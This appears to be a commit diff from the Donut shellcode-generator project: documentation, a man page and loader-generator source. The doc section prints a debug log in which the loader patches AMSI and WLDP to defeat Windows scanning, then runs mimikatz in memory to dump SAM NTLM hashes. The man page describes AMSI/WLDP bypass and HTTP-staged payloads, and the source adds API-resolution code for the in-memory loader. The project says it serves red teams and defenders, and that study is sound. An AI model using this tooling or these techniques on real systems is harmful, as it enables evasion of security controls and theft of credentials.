711 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E74A4DD56C6B3154
712 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 527C502C0BC36267
713 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 055C3E8A4CF21475
714 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4D1965E404D783BA
715 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for CC736E0143DB8F2A
716 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C87BFE8578BB0049
717 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FC7CC8D82764DFBF
718 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6F6432B588D39C8D
719 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 2828FB8F68349704
720 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 9752F1AA167F8E79
721 DEBUG: peb.c:87:FindExport(): 9752f1aa167f8e79 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
722 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
723 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
724 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 8211344A519AF3BA
725 DEBUG: peb.c:87:FindExport(): 8211344a519af3ba is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
726 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
727 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
728 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FF0605E1258BEE44
729 DEBUG: peb.c:87:FindExport(): ff0605e1258bee44 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
730 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
731 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
732 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEDA5C642834D7
733 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A69EAF72442222A4
734 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4DBA40D90962E1D6
735 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A1143A47656B2526
736 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 62FF88CDC045477E
737 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E20BCE2C11E82C7B
738 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A469294ED1E1D8DC
739 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 61E26E7C5DD38D2C
740 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 145C8CF24F5EAF3E
741 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 12ACA3AD3CC20AF5
742 DEBUG: loader/loader.c:218:MainProc(): Module is embedded.
743 DEBUG: bypass.c:112:DisableAMSI(): Length of AmsiScanBufferStub is 36 bytes.
744 DEBUG: bypass.c:122:DisableAMSI(): Overwriting AmsiScanBuffer
745 DEBUG: bypass.c:137:DisableAMSI(): Length of AmsiScanStringStub is 36 bytes.
746 DEBUG: bypass.c:147:DisableAMSI(): Overwriting AmsiScanString
747 DEBUG: loader/loader.c:226:MainProc(): DisableAMSI OK
748 DEBUG: bypass.c:326:DisableWLDP(): Length of WldpQueryDynamicCodeTrustStub is 20 bytes.
749 DEBUG: bypass.c:350:DisableWLDP(): Length of WldpIsClassInApprovedListStub is 36 bytes.
750 DEBUG: loader/loader.c:232:MainProc(): DisableWLDP OK
751 DEBUG: loader/loader.c:239:MainProc(): Compression engine is 5
752 DEBUG: loader/loader.c:242:MainProc(): Allocating 1015240 bytes of memory for decompressed file and module information
753 DEBUG: loader/loader.c:252:MainProc(): Duplicating DONUT_MODULE
754 DEBUG: loader/loader.c:256:MainProc(): Decompressing 478726 -> 1013912
755 DEBUG: loader/loader.c:270:MainProc(): WorkSpace size : 1415999 | Fragment size : 5161
756 DEBUG: loader/loader.c:277:MainProc(): Decompressing with RtlDecompressBufferEx(XPRESS HUFFMAN)
757 DEBUG: loader/loader.c:302:MainProc(): Checking type of module
758 DEBUG: inmem_pe.c:103:RunPE(): Allocating 1019904 (0xf9000) bytes of RWX memory for file
759 DEBUG: inmem_pe.c:112:RunPE(): Copying Headers
760 DEBUG: inmem_pe.c:115:RunPE(): Copying each section to RWX memory 00000178FF170000
761 DEBUG: inmem_pe.c:127:RunPE(): Applying Relocations
762 DEBUG: inmem_pe.c:151:RunPE(): Processing the Import Table
763 DEBUG: inmem_pe.c:159:RunPE(): Loading ADVAPI32.dll
764 DEBUG: inmem_pe.c:159:RunPE(): Loading Cabinet.dll
765 DEBUG: inmem_pe.c:159:RunPE(): Loading CRYPT32.dll
766 DEBUG: inmem_pe.c:159:RunPE(): Loading cryptdll.dll
767 DEBUG: inmem_pe.c:159:RunPE(): Loading DNSAPI.dll
768 DEBUG: inmem_pe.c:159:RunPE(): Loading FLTLIB.DLL
769 DEBUG: inmem_pe.c:159:RunPE(): Loading NETAPI32.dll
770 DEBUG: inmem_pe.c:159:RunPE(): Loading ole32.dll
771 DEBUG: inmem_pe.c:159:RunPE(): Loading OLEAUT32.dll
772 DEBUG: inmem_pe.c:159:RunPE(): Loading RPCRT4.dll
773 DEBUG: inmem_pe.c:159:RunPE(): Loading SHLWAPI.dll
774 DEBUG: inmem_pe.c:159:RunPE(): Loading SAMLIB.dll
775 DEBUG: inmem_pe.c:159:RunPE(): Loading Secur32.dll
776 DEBUG: inmem_pe.c:159:RunPE(): Loading SHELL32.dll
777 DEBUG: inmem_pe.c:159:RunPE(): Loading USER32.dll
778 DEBUG: inmem_pe.c:159:RunPE(): Loading USERENV.dll
779 DEBUG: inmem_pe.c:159:RunPE(): Loading VERSION.dll
780 DEBUG: inmem_pe.c:159:RunPE(): Loading HID.DLL
781 DEBUG: inmem_pe.c:159:RunPE(): Loading SETUPAPI.dll
782 DEBUG: inmem_pe.c:159:RunPE(): Loading WinSCard.dll
783 DEBUG: inmem_pe.c:159:RunPE(): Loading WINSTA.dll
784 DEBUG: inmem_pe.c:159:RunPE(): Loading WLDAP32.dll
785 DEBUG: inmem_pe.c:159:RunPE(): Loading advapi32.dll
786 DEBUG: inmem_pe.c:159:RunPE(): Loading msasn1.dll
787 DEBUG: inmem_pe.c:159:RunPE(): Loading ntdll.dll
788 DEBUG: inmem_pe.c:159:RunPE(): Loading netapi32.dll
789 DEBUG: inmem_pe.c:159:RunPE(): Loading KERNEL32.dll
790 DEBUG: inmem_pe.c:182:RunPE(): Replacing KERNEL32.dll!ExitProcess with ntdll!RtlExitUserThread
791 DEBUG: inmem_pe.c:159:RunPE(): Loading msvcrt.dll
792 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!exit with ntdll!RtlExitUserThread
793 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_cexit with ntdll!RtlExitUserThread
794 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_exit with ntdll!RtlExitUserThread
795 DEBUG: inmem_pe.c:196:RunPE(): Processing Delayed Import Table
796 DEBUG: inmem_pe.c:204:RunPE(): Loading bcrypt.dll
797 DEBUG: inmem_pe.c:204:RunPE(): Loading ncrypt.dll
798 DEBUG: inmem_pe.c:319:RunPE(): Setting command line: MTFM lsadump::sam exit
799 DEBUG: inmem_pe.c:433:SetCommandLineW(): Obtaining handle for kernelbase
800 DEBUG: inmem_pe.c:449:SetCommandLineW(): Searching 2161 pointers
801 DEBUG: inmem_pe.c:458:SetCommandLineW(): BaseUnicodeCommandLine at 00007FFFD1609E70 : loader instance
802 DEBUG: inmem_pe.c:466:SetCommandLineW(): New BaseUnicodeCommandLine at 00007FFFD1609E70 : MTFM lsadump::sam exit
803 DEBUG: inmem_pe.c:483:SetCommandLineW(): New BaseAnsiCommandLine at 00007FFFD1609E60 : MTFM lsadump::sam exit
804 DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting ucrtbase.dll!__p__acmdln "loader instance" to "MTFM lsadump::sam exit"
805 DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting ucrtbase.dll!__p__wcmdln "loader instance" to "MTFM lsadump::sam exit"
806 DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting msvcrt.dll!_acmdln "loader instance" to "MTFM lsadump::sam exit"
807 DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting msvcrt.dll!_wcmdln "loader instance" to "MTFM lsadump::sam exit"
808 DEBUG: inmem_pe.c:323:RunPE(): Wiping Headers from memory
809 DEBUG: inmem_pe.c:332:RunPE(): Creating thread for entrypoint of EXE : 00000178FF2007F8
810
811
812 .#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
813 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
814 ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
815 ## \ / ## > http://blog.gentilkiwi.com/mimikatz
816 '## v ##' Vincent LE TOUX ( [email protected] )
817 '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
818
819 mimikatz(commandline) # lsadump::sam
820 Domain : DESKTOP-B888L2R
821 SysKey : b43927eef0f56833c527ea951c37abc1
822 Local SID : S-1-5-21-1047138248-288568923-692962947
823
824 SAMKey : f1813d42812fcde9c5fe08807370613d
825
826 RID : 000001f4 (500)
827 User : Administrator
828
829 RID : 000001f5 (501)
830 User : Guest
831
832 RID : 000001f7 (503)
833 User : DefaultAccount
834
835 RID : 000001f8 (504)
836 User : WDAGUtilityAccount
837 Hash NTLM: c288f1c30b232571b0222ae6a5b7d223
838
839 RID : 000003e9 (1001)
840 User : john
841 Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c
842
843 RID : 000003ea (1002)
844 User : user
845 Hash NTLM: 5835048ce94ad0564e29a924a03510ef
846
847 RID : 000003eb (1003)
848 User : test
849
850 mimikatz(commandline) # exit
851 Bye!
852
853 DEBUG: inmem_pe.c:338:RunPE(): Process terminated
854 DEBUG: inmem_pe.c:349:RunPE(): Erasing 1019904 bytes of memory at 00000178FF170000
855 DEBUG: inmem_pe.c:353:RunPE(): Releasing memory
856 DEBUG: loader/loader.c:343:MainProc(): Erasing RW memory for instance
857 DEBUG: loader/loader.c:346:MainProc(): Releasing RW memory for instance
858 DEBUG: loader/loader.c:354:MainProc(): Returning to caller
859 </pre>
860
861 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
862
863 <h2 id="loader">13. Extending The Loader</h2>
864
865 <p>Donut was never designed with modularity in mind, however, a new version in future will try to simplify the process of extending the loader, so that others can write their own code for it. Currently, simple changes to the loader can sometimes require lots of changes to the entire code base and this isn't really ideal. If for any reason you want to update the loader to include additional functionality, the following steps are required.</p>
866
867 <h3>1. Declare the function pointers</h3>
868
869 <p>For each API you want the loader to use, declare a function pointer in loader/winapi.h. For example, the <code>Sleep</code> API is declared in its SDK header file as:</p>
870
871 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
872 </pre>
873
874 <p>The function pointer for this would be declared in loader/winapi.h as:</p>
875
876 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>(</span><span style='color:#603000; '>WINAPI</span> <span style='color:#808030; '>*</span>Sleep_t<span style='color:#808030; '>)</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
877 </pre>
878
879 <h3>2. Update the API string array and function pointer array</h3>
880
881 <p>At the moment, Donut resolves API using a 64-bit hash, which is calculated by the generator before being stored in the loader itself. In donut.c is a variable called <var>api_imports</var>, declared as an array of <code>API_IMPORT</code> structures. Each entry contains a case-sensitive API string and corresponding DLL string in lowercase. The <code>Sleep</code> API is exported by kernel32.dll, so if we want the loader to use Sleep, the <code>api_imports</code> must have the following added to it. This array is terminated by an empty entry.</p>
882
883 <pre style='color:#000000;background:#ffffff;'> <span style='color:#800080; '>{</span>KERNEL32_DLL<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>Sleep</span><span style='color:#800000; '>"</span><span style='color:#800080; '>}</span><span style='color:#808030; '>,</span>
884 </pre>
885
886 <p>Of course, KERNEL32_DLL used here is a symbolic constant for "kernel32.dll".</p>
887
888 <p>The <code>DONUT_INSTANCE</code> structure is defined in include/donut.h and one of the fields called <code>api</code> is defined as a union to hold three members. <var>hash</var> is an array of <code>uint64_t</code> integers to hold a 64-bit hash of each API string. <var>addr</var> is an array of <code>void*</code> pointers to hold the address of an API in memory and finally a structure holding all the function pointers. These pointers are placed in the same order as the API strings stored in <var>api_imports</var>. Currently, the <var>api</var> member can hold up to 64 function pointers or hashes, but this can be increased if required.</p>
889
890 <p>Where you place the API string in <var>api_imports</var> is entirely up to you, but it <em>must</em> be in the same order as where the function pointer is placed in the <code>DONUT_INSTANCE</code> structure.</p>
891
892 <h3>3. Update DLL names</h3>
893
894 <p>A number of DLL are already loaded by a process; ntdll.dll, kernel32.dll and kernelbase.dll. For everything else, the instance contains a list of DLL strings loaded before attempting to resolve the address of APIs. The following list of DLLs seperated by semi-colon are loaded prior to resolving API. If the API you want Donut loader to use is exported by a DLL not shown here, you need to add it to the list.</p>
895
896 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// required for each API used by the loader</span>
897 <span style='color:#004a43; '>#</span><span style='color:#004a43; '>define</span><span style='color:#004a43; '> DLL_NAMES </span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>ole32;oleaut32;wininet;mscoree;shell32;dnsapi</span><span style='color:#800000; '>"</span>
898 </pre>
899
900 <h3>4. Calling an API</h3>
901
902 <p>If the API were successfully resolved, simply referencing the function pointer in a pointer to <code>DONUT_INSTANCE</code> is enough to invoke it. The following line of code shows how to call the <code>Sleep</code> API declared earlier.</p>
903
904 <pre style='color:#000000;background:#ffffff;'>inst<span style='color:#808030; '>-</span><span style='color:#808030; '>></span>api<span style='color:#808030; '>.</span><span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#008c00; '>1000</span><span style='color:#808030; '>*</span><span style='color:#008c00; '>5</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
905 </pre>
906
907 <p>Future plans for Donut are to provide multiple options for resolving API; Import Address Table (IAT), Export Address Table (EAT) and <a href="https://modexp.wordpress.com/2019/05/19/shellcode-getprocaddress/">Exception Directory</a> to name a few. It should also be much easier to write custom payloads using the loader.</p>
908
909 </body>
910 </html>
+131
-0
docs/donut.1 less more
0 '\" t
1 .\" Title: donut
2 .\" Author: Odzhan
3 .\" Date: 12/24/2019
4 .\" Manual: Donut Reference Guide
5 .\" Source: Donut
6 .\" Language: English
7 .\"
8 .TH "DONUT" "1" "12/24/2019" "Donut v0.9.3" "Donut Reference Guide"
9 .SH NAME
10 donut \- shellcode generator
11 .SH SYNOPSIS
12 .B donut
13 [options]
14 .IR file ...
15 .SH DESCRIPTION
16 Donut, named after the dotNET framework, generates position-independent code for in-memory execution of VBS/JS/EXE/DLL files on the Microsoft Windows operating system. Both managed .NET assemblies and unmanaged/native EXE, DLL files are supported by the loader. There are dynamic and static libraries available for both Windows and Linux.
17 .SH MODULE OPTIONS
18 .TP
19 .BR \-n " " <name>
20 Module name for HTTP staging. If entropy is enabled, this is generated randomly.
21 .TP
22 .BR \-s " " <server>
23 HTTP server that will host the donut module.
24 .TP
25 .BR \-e " " <level>
26 Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)
27 .SH PIC/SHELLCODE OPTIONS
28 .TP
29 .BR \-a " " <arch>
30 Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
31 .TP
32 .BR \-b " " <level>
33 Bypass AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)
34 .TP
35 .BR \-o " " <path>
36 Output file to save loader. Default is "loader.bin"
37 .TP
38 .BR \-f " " <format>
39 Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal
40 .TP
41 .BR \-y " " <addr>
42 Create a new thread for loader and continue execution at address supplied. \fIaddr\fR Must be in hexadecimal format.
43 .TP
44 .BR \-x " " <action>
45 Exiting. 1=Exit thread (default), 2=Exit process
46 .SH FILE OPTIONS
47 .TP
48 .BR \-c " " <namespace.class>
49 Optional class name. (required for .NET DLL)
50 .TP
51 .BR \-d " " <name>
52 AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
53 .TP
54 .BR \-m " " <method | api>
55 Optional method or function for DLL. (a method is required for .NET DLL)
56 .TP
57 .BR \-p " " <arguments>
58 Optional arguments/command line inside quotations for DLL method/function or EXE.
59 .TP
60 .BR \-w
61 Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
62 .TP
63 .BR \-r " " <version>
64 CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
65 .TP
66 .BR \-t
67 Execute the entrypoint of an unmanaged EXE as a thread.
68 .TP
69 .BR \-z " " <engine>
70 Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman.
71 Compression engines 3, 4 and 5 are only available on Windows.
72 .SH AUTHORS
73 Odzhan, TheWover
74 .SH DISCLAIMER
75 The authors are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.
76 .SH COPYRIGHT
77 BSD 3-Clause License
78
79 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
80
81 Redistribution and use in source and binary forms, with or without
82 modification, are permitted provided that the following conditions are met:
83
84 * Redistributions of source code must retain the above copyright notice, this
85 list of conditions and the following disclaimer.
86
87 * Redistributions in binary form must reproduce the above copyright notice,
88 this list of conditions and the following disclaimer in the documentation
89 and/or other materials provided with the distribution.
90
91 * Neither the name of the copyright holder nor the names of its
92 contributors may be used to endorse or promote products derived from
93 this software without specific prior written permission.
94
95 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
96 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
97 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
98 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
99 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
100 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
101 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
102 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
103 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
104 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
105 .SH "NOTES"
106 .IP " 1." 4
107 Loading .NET Assemblies From Memory.
108 .RS 4
109 \%https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
110 .RE
111 .IP " 2." 4
112 Donut - Injecting .NET Assemblies as Shellcode
113 .RS 4
114 \%https://thewover.github.io/Introducing-Donut/
115 .RE
116 .IP " 3." 4
117 How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code
118 .RS 4
119 \%https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/
120 .RE
121 .IP " 4." 4
122 In-Memory Execution of DLL
123 .RS 4
124 \%https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/
125 .RE
126 .IP " 5." 4
127 Data Compression
128 .RS 4
129 \%https://modexp.wordpress.com/2019/12/08/shellcode-compression/
130 .RE
+1276
-694
donut.c less more
3030
3131 #include "donut.h"
3232
33 #include "payload/payload_exe_x86.h"
34 #include "payload/payload_exe_x64.h"
33 #include "loader_exe_x86.h"
34 #include "loader_exe_x64.h"
3535
3636 #define PUT_BYTE(p, v) { *(uint8_t *)(p) = (uint8_t) (v); p = (uint8_t*)p + 1; }
3737 #define PUT_HWORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 2); p = (uint8_t*)p + 2; }
3838 #define PUT_WORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 4); p = (uint8_t*)p + 4; }
3939 #define PUT_BYTES(p, v, n) { memcpy(p, v, n); p = (uint8_t*)p + n; }
4040
41 // these have to be in same order as DONUT_INSTANCE structure in donut.h
42 static API_IMPORT api_imports[]=
43 {
41 // required for each API used by the loader
42 #define DLL_NAMES "ole32;oleaut32;wininet;mscoree;shell32"
43
44 // These must be in the same order as the DONUT_INSTANCE structure defined in donut.h
45 static API_IMPORT api_imports[] = {
4446 {KERNEL32_DLL, "LoadLibraryA"},
4547 {KERNEL32_DLL, "GetProcAddress"},
4648 {KERNEL32_DLL, "GetModuleHandleA"},
5153 {KERNEL32_DLL, "Sleep"},
5254 {KERNEL32_DLL, "MultiByteToWideChar"},
5355 {KERNEL32_DLL, "GetUserDefaultLCID"},
54
56 {KERNEL32_DLL, "WaitForSingleObject"},
57 {KERNEL32_DLL, "CreateThread"},
58 {KERNEL32_DLL, "GetThreadContext"},
59 {KERNEL32_DLL, "GetCurrentThread"},
60
61 {SHELL32_DLL, "CommandLineToArgvW"},
62
5563 {OLEAUT32_DLL, "SafeArrayCreate"},
5664 {OLEAUT32_DLL, "SafeArrayCreateVector"},
5765 {OLEAUT32_DLL, "SafeArrayPutElement"},
7987 {OLE32_DLL, "CoCreateInstance"},
8088 {OLE32_DLL, "CoUninitialize"},
8189
82 { NULL, NULL }
90 {NTDLL_DLL, "RtlEqualUnicodeString"},
91 {NTDLL_DLL, "RtlEqualString"},
92 {NTDLL_DLL, "RtlUnicodeStringToAnsiString"},
93 {NTDLL_DLL, "RtlInitUnicodeString"},
94 {NTDLL_DLL, "RtlExitUserThread"},
95 {NTDLL_DLL, "RtlExitUserProcess"},
96 {NTDLL_DLL, "RtlCreateUnicodeString"},
97 {NTDLL_DLL, "RtlGetCompressionWorkSpaceSize"},
98 {NTDLL_DLL, "RtlDecompressBufferEx"},
99 {NTDLL_DLL, "NtContinue"},
100 //{NTDLL_DLL, "RtlFreeUnicodeString"},
101 //{NTDLL_DLL, "RtlFreeString"},
102
103 { NULL, NULL } // last one always contains two NULL pointers
83104 };
84105
85106 // required to load .NET assemblies
116137
117138 static GUID xIID_IActiveScriptSite = {
118139 0xdb01a1e3, 0xa42b, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
140
141 static GUID xIID_IActiveScriptSiteWindow = {
142 0xd10f6761, 0x83e9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
119143
120144 static GUID xIID_IActiveScriptParse32 = {
121145 0xbb1a2ae2, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
129153 static GUID xCLSID_JScript = {
130154 0xF414C260, 0x6AC0, 0x11CF, {0xB6, 0xD1, 0x00, 0xAA, 0x00, 0xBB, 0xBB, 0x58}};
131155
132 // required to load XSL files
133 static GUID xCLSID_DOMDocument30 = {
134 0xf5078f32, 0xc551, 0x11d3, {0x89, 0xb9, 0x00, 0x00, 0xf8, 0x1f, 0xe2, 0x21}};
135
136 static GUID xIID_IXMLDOMDocument = {
137 0x2933BF81, 0x7B36, 0x11D2, {0xB2, 0x0E, 0x00, 0xC0, 0x4F, 0x98, 0x3E, 0x60}};
138
139 static GUID xIID_IXMLDOMNode = {
140 0x2933bf80, 0x7b36, 0x11d2, {0xb2, 0x0e, 0x00, 0xc0, 0x4f, 0x98, 0x3e, 0x60}};
141
142 #if defined(_WIN32) | defined(_WIN64)
143 #include "include/mmap-windows.c"
144 #ifdef _MSC_VER
145 #define strcasecmp stricmp
146 #endif
147 #endif
156 // where to store information about input file
157 file_info fi;
148158
149159 // return pointer to DOS header
150160 static PIMAGE_DOS_HEADER DosHdr(void *map) {
192202 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
193203 }
194204
195 static ULONG64 rva2ofs (void *base, DWORD rva) {
205 static ULONG64 rva2ofs (void *base, ULONG64 rva) {
196206 DWORD i;
197207 ULONG64 ofs;
198208 PIMAGE_DOS_HEADER dos;
201211
202212 dos = (PIMAGE_DOS_HEADER)base;
203213 nt = (PIMAGE_NT_HEADERS)((PBYTE)base + dos->e_lfanew);
204 sh = IMAGE_FIRST_SECTION(nt);
205
206 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
207 if (rva >= sh[i].VirtualAddress &&
208 rva < sh[i].VirtualAddress + sh[i].SizeOfRawData) {
214 sh = (PIMAGE_SECTION_HEADER)
215 ((PBYTE)&nt->OptionalHeader + nt->FileHeader.SizeOfOptionalHeader);
216
217 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
218 if ((rva >= sh[i].VirtualAddress) &&
219 (rva < (sh[i].VirtualAddress + sh[i].SizeOfRawData))) {
209220
210221 ofs = sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
211222 return ofs;
214225 return -1;
215226 }
216227
217 // map a file into memory for reading
218 static int map_file(const char *path, file_info *fi) {
228 #ifdef WINDOWS
229 #include "mmap-windows.c"
230 #endif
231
232 /**
233 * Function: map_file
234 * ----------------------------
235 * Open and map the contents of file into memory.
236 *
237 * INPUT : path = file to map
238 *
239 * OUTPUT : Donut error code.
240 */
241 static int map_file(const char *path) {
219242 struct stat fs;
220243
221 DPRINT("Reading size of file : %s", path);
244 DPRINT("Entering.");
245
222246 if(stat(path, &fs) != 0) {
247 DPRINT("Unable to read size of file : %s", path);
223248 return DONUT_ERROR_FILE_NOT_FOUND;
224249 }
225250
226251 if(fs.st_size == 0) {
252 DPRINT("File appears to be empty!");
227253 return DONUT_ERROR_FILE_EMPTY;
228254 }
229
230 DPRINT("Opening %s", path);
231 fi->fd = open(path, O_RDONLY);
232
233 if(fi->fd < 0) {
255
256 fi.fd = open(path, O_RDONLY);
257
258 if(fi.fd < 0) {
259 DPRINT("Unable to open %s for reading.", path);
234260 return DONUT_ERROR_FILE_ACCESS;
235261 }
236262
237 fi->size = fs.st_size;
238
239 // map into memory
240 DPRINT("Mapping %" PRIi64 " bytes for %s", fi->size, path);
241 fi->map = mmap(NULL, fi->size,
242 PROT_READ, MAP_PRIVATE, fi->fd, 0);
263 fi.len = fs.st_size;
264
265 fi.data = mmap(NULL, fi.len, PROT_READ, MAP_PRIVATE, fi.fd, 0);
243266
244267 // no mapping? close file
245 if(fi->map == NULL) {
246 close(fi->fd);
247 fi->map = NULL;
268 if(fi.data == NULL) {
269 DPRINT("Unable to map file : %s", path);
270 close(fi.fd);
248271 return DONUT_ERROR_NO_MEMORY;
249272 }
250273 return DONUT_ERROR_SUCCESS;
251274 }
252275
253 // unmap a file from memory previously opened with map_file()
254 static int unmap_file(file_info *fi) {
255
256 if(fi == NULL) return 0;
257
258 DPRINT("Unmapping");
259 munmap(fi->map, fi->size);
260
261 DPRINT("Closing");
262 close(fi->fd);
263
264 return 1;
265 }
266
267 static int get_file_info(const char *path, file_info *fi) {
268 PIMAGE_NT_HEADERS nt;
269 PIMAGE_DATA_DIRECTORY dir;
270 PMDSTORAGESIGNATURE pss;
271 PIMAGE_COR20_HEADER cor;
272 DWORD dll, rva, ofs, cpu;
273 PCHAR ext;
274 int err = DONUT_ERROR_SUCCESS;
275
276 /**
277 * Function: unmap_file
278 * ----------------------------
279 * Releases memory allocated for file and closes descriptor.
280 *
281 * INPUT : Nothing
282 *
283 * OUTPUT : Donut error code
284 */
285 static int unmap_file(void) {
286
287 if(fi.zdata != NULL) {
288 DPRINT("Releasing compressed data.");
289 free(fi.zdata);
290 fi.zdata = NULL;
291 }
292 if(fi.data != NULL) {
293 DPRINT("Unmapping input file.");
294 munmap(fi.data, fi.len);
295 fi.data = NULL;
296 }
297 if(fi.fd != 0) {
298 DPRINT("Closing input file.");
299 close(fi.fd);
300 fi.fd = 0;
301 }
302 return DONUT_ERROR_SUCCESS;
303 }
304
305 // only included for executable generator or debug build
306 #if defined(DONUT_EXE) || defined(DEBUG)
307 /**
308 * Function: file_diff
309 * ----------------------------
310 * Calculates the ratio between two lengths for compression and decompression.
311 *
312 * INPUT : new_len = new length
313 * : old_len = old length
314 *
315 * OUTPUT : ratio as a percentage
316 */
317 static uint32_t file_diff(uint32_t new_len, uint32_t old_len) {
318 if (new_len <= UINT_MAX / 100) {
319 new_len *= 100;
320 } else {
321 old_len /= 100;
322 }
323 if (old_len == 0) {
324 old_len = 1;
325 }
326 return (100 - (new_len / old_len));
327 }
328 #endif
329
330 /**
331 * Function: compress_file
332 * ----------------------------
333 * Compresses the input file based on engine selected by user
334 *
335 * INPUT : Pointer to Donut configuration.
336 *
337 * OUTPUT : Donut error code.
338 */
339 int compress_file(PDONUT_CONFIG c) {
340 int err = DONUT_ERROR_SUCCESS;
341
342 // RtlCompressBuffer is only available on Windows
343 #ifdef WINDOWS
